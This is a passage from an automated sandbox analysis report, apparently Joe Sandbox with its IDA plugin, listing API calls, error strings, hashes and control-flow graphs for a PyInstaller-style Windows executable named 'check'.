                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                • Instruction ID: 55ff0b7a46938cd426668ba1260f8b3089a07cf6fd4aab651c2da98eade54a90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2518A32A1864286E710DF25E8811B96761FB9D78CF64C1BAEA4EC76B5DF3CE4018740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                • Instruction ID: d49e4c59db592fcf98b51664d96f88d779706a2386861e3af167b6e00e7a6ace
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF0C822A1C74186F7608F64B4887667350EB8976CF144335DAAFC26E4DF3CE459CA04
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                • Instruction ID: 4af4095d7b346cfec56025210f8001b552a205a3a957191e47997e0182274c85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE02CE21B1D65741FA55AB12941827A2680AF4DBACF75C6B4EE6FD73F6EF3CA4018300

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 331 7ff60b121950-7ff60b12198b call 7ff60b1245c0 334 7ff60b121c4e-7ff60b121c72 call 7ff60b12c550 331->334 335 7ff60b121991-7ff60b1219d1 call 7ff60b127f90 331->335 340 7ff60b1219d7-7ff60b1219e7 call 7ff60b1306d4 335->340 341 7ff60b121c3b-7ff60b121c3e call 7ff60b13004c 335->341 346 7ff60b1219e9-7ff60b121a03 call 7ff60b134f08 call 7ff60b122910 340->346 347 7ff60b121a08-7ff60b121a24 call 7ff60b13039c 340->347 345 7ff60b121c43-7ff60b121c4b 341->345 345->334 346->341 352 7ff60b121a26-7ff60b121a40 call 7ff60b134f08 call 7ff60b122910 347->352 353 7ff60b121a45-7ff60b121a5a call 7ff60b134f28 347->353 352->341 361 7ff60b121a7b-7ff60b121b05 call 7ff60b121c80 * 2 call 7ff60b1306d4 call 7ff60b134f44 353->361 362 7ff60b121a5c-7ff60b121a76 call 7ff60b134f08 call 7ff60b122910 353->362 375 7ff60b121b0a-7ff60b121b14 361->375 362->341 376 7ff60b121b16-7ff60b121b30 call 7ff60b134f08 call 7ff60b122910 375->376 377 7ff60b121b35-7ff60b121b4e call 7ff60b13039c 375->377 376->341 382 7ff60b121b6f-7ff60b121b8b call 7ff60b130110 377->382 383 7ff60b121b50-7ff60b121b6a call 7ff60b134f08 call 7ff60b122910 377->383 391 7ff60b121b8d-7ff60b121b99 call 7ff60b122710 382->391 392 7ff60b121b9e-7ff60b121bac 382->392 383->341 391->341 392->341 395 7ff60b121bb2-7ff60b121bb9 392->395 397 7ff60b121bc1-7ff60b121bc7 395->397 398 7ff60b121bc9-7ff60b121bd6 397->398 399 7ff60b121be0-7ff60b121bef 397->399 400 7ff60b121bf1-7ff60b121bfa 398->400 399->399 399->400 401 7ff60b121bfc-7ff60b121bff 400->401 402 7ff60b121c0f 400->402 401->402 403 7ff60b121c01-7ff60b121c04 401->403 404 7ff60b121c11-7ff60b121c24 402->404 403->402 405 7ff60b121c06-7ff60b121c09 403->405 406 7ff60b121c26 404->406 407 7ff60b121c2d-7ff60b121c39 404->407 405->402 408 7ff60b121c0b-7ff60b121c0d 405->408 406->407 407->341 407->397 408->404
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B127F90: _fread_nolock.LIBCMT ref: 00007FF60B12803A
                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF60B121A1B
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF60B121B6A), ref: 00007FF60B12295E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                • Opcode ID: 507f08f26e205d920f148b85cad333997b9676a31346628d4d7d58e95cedc463
                                                                                                                                                                                                                • Instruction ID: 5c97e28fd9c74969582b2d2cac5b7ffb802d759c5f35c89c2b4c36a9b3441b98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 507f08f26e205d920f148b85cad333997b9676a31346628d4d7d58e95cedc463
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC81A271A0C68696EB20DB25D0402BA33A0EF4D78CF64C471D98FD77A5DE3CE9658740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 409 7ff60b121600-7ff60b121611 410 7ff60b121637-7ff60b121651 call 7ff60b1245c0 409->410 411 7ff60b121613-7ff60b12161c call 7ff60b121050 409->411 418 7ff60b121653-7ff60b121681 call 7ff60b134f08 call 7ff60b122910 410->418 419 7ff60b121682-7ff60b12169c call 7ff60b1245c0 410->419 416 7ff60b12162e-7ff60b121636 411->416 417 7ff60b12161e-7ff60b121629 call 7ff60b122710 411->417 417->416 425 7ff60b1216b8-7ff60b1216cf call 7ff60b1306d4 419->425 426 7ff60b12169e-7ff60b1216b3 call 7ff60b122710 419->426 434 7ff60b1216f9-7ff60b1216fd 425->434 435 7ff60b1216d1-7ff60b1216f4 call 7ff60b134f08 call 7ff60b122910 425->435 433 7ff60b121821-7ff60b121824 call 7ff60b13004c 426->433 442 7ff60b121829-7ff60b12183b 433->442 436 7ff60b121717-7ff60b121737 call 7ff60b134f44 434->436 437 7ff60b1216ff-7ff60b12170b call 7ff60b121210 434->437 447 7ff60b121819-7ff60b12181c call 7ff60b13004c 435->447 448 7ff60b121739-7ff60b12175c call 7ff60b134f08 call 7ff60b122910 436->448 449 7ff60b121761-7ff60b12176c 436->449 444 7ff60b121710-7ff60b121712 437->444 444->447 447->433 461 7ff60b12180f-7ff60b121814 448->461 453 7ff60b121802-7ff60b12180a call 7ff60b134f30 449->453 454 7ff60b121772-7ff60b121777 449->454 453->461 457 7ff60b121780-7ff60b1217a2 call 7ff60b13039c 454->457 464 7ff60b1217da-7ff60b1217e6 call 7ff60b134f08 457->464 465 7ff60b1217a4-7ff60b1217bc call 7ff60b130adc 457->465 461->447 472 7ff60b1217ed-7ff60b1217f8 call 7ff60b122910 464->472 470 7ff60b1217be-7ff60b1217c1 465->470 471 7ff60b1217c5-7ff60b1217d8 call 7ff60b134f08 465->471 470->457 473 7ff60b1217c3 470->473 471->472 476 7ff60b1217fd 472->476 473->476 476->453
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                • Opcode ID: 1024a7a5ee8cd7a3c756baff70d017aadc137d22fcd9cea75d224d6f76c21f88
                                                                                                                                                                                                                • Instruction ID: f72c2ac14b4649b0f5710750230bafcfd7ef7a75a60115acd386bda54e92b77e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1024a7a5ee8cd7a3c756baff70d017aadc137d22fcd9cea75d224d6f76c21f88
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6751AE61A0C647A2EA10DB11D4401AA2390BF8DB9CF74C5B1EE0ED77B6EF3CE9658740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF60B123CBB), ref: 00007FF60B128704
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF60B123CBB), ref: 00007FF60B12870A
                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF60B123CBB), ref: 00007FF60B12874C
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128830: GetEnvironmentVariableW.KERNEL32(00007FF60B12388E), ref: 00007FF60B128867
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B128830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF60B128889
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B138238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60B138251
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122810: MessageBoxW.USER32 ref: 00007FF60B1228EA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                • Instruction ID: cec67eb786c230706141a527b769b962bf5aac75cc438811fd41a34e7388c174
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E417211B1964245FA10AB25A9552B91291AF8EBCCFB4C1B1ED0FC77FAEE3CE911C340

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 756 7ff60b121210-7ff60b12126d call 7ff60b12bd80 759 7ff60b121297-7ff60b1212af call 7ff60b134f44 756->759 760 7ff60b12126f-7ff60b121296 call 7ff60b122710 756->760 765 7ff60b1212b1-7ff60b1212cf call 7ff60b134f08 call 7ff60b122910 759->765 766 7ff60b1212d4-7ff60b1212e4 call 7ff60b134f44 759->766 777 7ff60b121439-7ff60b12144e call 7ff60b12ba60 call 7ff60b134f30 * 2 765->777 772 7ff60b1212e6-7ff60b121304 call 7ff60b134f08 call 7ff60b122910 766->772 773 7ff60b121309-7ff60b12131b 766->773 772->777 776 7ff60b121320-7ff60b121345 call 7ff60b13039c 773->776 785 7ff60b12134b-7ff60b121355 call 7ff60b130110 776->785 786 7ff60b121431 776->786 793 7ff60b121453-7ff60b12146d 777->793 785->786 792 7ff60b12135b-7ff60b121367 785->792 786->777 794 7ff60b121370-7ff60b121398 call 7ff60b12a1c0 792->794 797 7ff60b121416-7ff60b12142c call 7ff60b122710 794->797 798 7ff60b12139a-7ff60b12139d 794->798 797->786 799 7ff60b12139f-7ff60b1213a9 798->799 800 7ff60b121411 798->800 802 7ff60b1213ab-7ff60b1213b9 call 7ff60b130adc 799->802 803 7ff60b1213d4-7ff60b1213d7 799->803 800->797 809 7ff60b1213be-7ff60b1213c1 802->809 805 7ff60b1213d9-7ff60b1213e7 call 7ff60b149e30 803->805 806 7ff60b1213ea-7ff60b1213ef 803->806 805->806 806->794 808 7ff60b1213f5-7ff60b1213f8 806->808 811 7ff60b1213fa-7ff60b1213fd 808->811 812 7ff60b12140c-7ff60b12140f 808->812 813 7ff60b1213cf-7ff60b1213d2 809->813 814 7ff60b1213c3-7ff60b1213cd call 7ff60b130110 809->814 811->797 815 7ff60b1213ff-7ff60b121407 811->815 812->786 813->797 814->806 814->813 815->776
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                • Opcode ID: b715c76ab38b7b4dfee5c32bc52a61b3ea5d4668c2ab7e2166fd60b1101cc4ae
                                                                                                                                                                                                                • Instruction ID: 5a3ebd129502a81ba5a116bf94d2a490b958d4b36bdb33732e3519fc6cbeca59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b715c76ab38b7b4dfee5c32bc52a61b3ea5d4668c2ab7e2166fd60b1101cc4ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB51D622A0868255EA20DB15E4403BA6291FF8EB9CF648175ED4FD77E5EF3CE921C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF60B13F0AA,?,?,-00000018,00007FF60B13AD53,?,?,?,00007FF60B13AC4A,?,?,?,00007FF60B135F3E), ref: 00007FF60B13EE8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF60B13F0AA,?,?,-00000018,00007FF60B13AD53,?,?,?,00007FF60B13AC4A,?,?,?,00007FF60B135F3E), ref: 00007FF60B13EE98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                • Instruction ID: 0a70a7169346e91d69e7f68a8c30b46f6a43a9cb8164af1bc1b6e7a58d1b4373
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F141C222B19B1281FA15CB16A8006762291BF4DFD8FA8C579DD1FC7BA4FF3CE8458214

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF60B123804), ref: 00007FF60B1236E1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B123804), ref: 00007FF60B1236EB
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122C9E
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122D63
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122C50: MessageBoxW.USER32 ref: 00007FF60B122D99
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                • Instruction ID: 6c281b950de8731c7c10a53ca62a22462c151286a2d7df2c5a3fdff58c330c51
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB217161F1C64281FA209724E8543BA2260BF9D39CF60C172E66FC65F5EF2CEA15C344

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 901 7ff60b13ba5c-7ff60b13ba82 902 7ff60b13ba9d-7ff60b13baa1 901->902 903 7ff60b13ba84-7ff60b13ba98 call 7ff60b134ee8 call 7ff60b134f08 901->903 904 7ff60b13be77-7ff60b13be83 call 7ff60b134ee8 call 7ff60b134f08 902->904 905 7ff60b13baa7-7ff60b13baae 902->905 917 7ff60b13be8e 903->917 924 7ff60b13be89 call 7ff60b13a8e0 904->924 905->904 907 7ff60b13bab4-7ff60b13bae2 905->907 907->904 911 7ff60b13bae8-7ff60b13baef 907->911 914 7ff60b13bb08-7ff60b13bb0b 911->914 915 7ff60b13baf1-7ff60b13bb03 call 7ff60b134ee8 call 7ff60b134f08 911->915 920 7ff60b13bb11-7ff60b13bb17 914->920 921 7ff60b13be73-7ff60b13be75 914->921 915->924 922 7ff60b13be91-7ff60b13bea8 917->922 920->921 925 7ff60b13bb1d-7ff60b13bb20 920->925 921->922 924->917 925->915 928 7ff60b13bb22-7ff60b13bb47 925->928 930 7ff60b13bb49-7ff60b13bb4b 928->930 931 7ff60b13bb7a-7ff60b13bb81 928->931 932 7ff60b13bb4d-7ff60b13bb54 930->932 933 7ff60b13bb72-7ff60b13bb78 930->933 934 7ff60b13bb56-7ff60b13bb6d call 7ff60b134ee8 call 7ff60b134f08 call 7ff60b13a8e0 931->934 935 7ff60b13bb83-7ff60b13bbab call 7ff60b13d5fc call 7ff60b13a948 * 2 931->935 932->933 932->934 937 7ff60b13bbf8-7ff60b13bc0f 933->937 965 7ff60b13bd00 934->965 961 7ff60b13bbc8-7ff60b13bbf3 call 7ff60b13c284 935->961 962 7ff60b13bbad-7ff60b13bbc3 call 7ff60b134f08 call 7ff60b134ee8 935->962 940 7ff60b13bc8a-7ff60b13bc94 call 7ff60b14391c 937->940 941 7ff60b13bc11-7ff60b13bc19 937->941 952 7ff60b13bc9a-7ff60b13bcaf 940->952 953 7ff60b13bd1e 940->953 941->940 945 7ff60b13bc1b-7ff60b13bc1d 941->945 945->940 949 7ff60b13bc1f-7ff60b13bc35 945->949 949->940 954 7ff60b13bc37-7ff60b13bc43 949->954 952->953 959 7ff60b13bcb1-7ff60b13bcc3 GetConsoleMode 952->959 957 7ff60b13bd23-7ff60b13bd43 ReadFile 953->957 954->940 960 7ff60b13bc45-7ff60b13bc47 954->960 963 7ff60b13bd49-7ff60b13bd51 957->963 964 7ff60b13be3d-7ff60b13be46 GetLastError 957->964 959->953 966 7ff60b13bcc5-7ff60b13bccd 959->966 960->940 967 7ff60b13bc49-7ff60b13bc61 960->967 961->937 962->965 963->964 970 7ff60b13bd57 963->970 973 7ff60b13be48-7ff60b13be5e call 7ff60b134f08 call 7ff60b134ee8 964->973 974 7ff60b13be63-7ff60b13be66 964->974 975 7ff60b13bd03-7ff60b13bd0d call 7ff60b13a948 965->975 966->957 972 7ff60b13bccf-7ff60b13bcf1 ReadConsoleW 966->972 967->940 968 7ff60b13bc63-7ff60b13bc6f 967->968 968->940 976 7ff60b13bc71-7ff60b13bc73 968->976 980 7ff60b13bd5e-7ff60b13bd73 970->980 982 7ff60b13bcf3 GetLastError 972->982 983 7ff60b13bd12-7ff60b13bd1c 972->983 973->965 977 7ff60b13bcf9-7ff60b13bcfb call 7ff60b134e7c 974->977 978 7ff60b13be6c-7ff60b13be6e 974->978 975->922 976->940 987 7ff60b13bc75-7ff60b13bc85 976->987 977->965 978->975 980->975 989 7ff60b13bd75-7ff60b13bd80 980->989 982->977 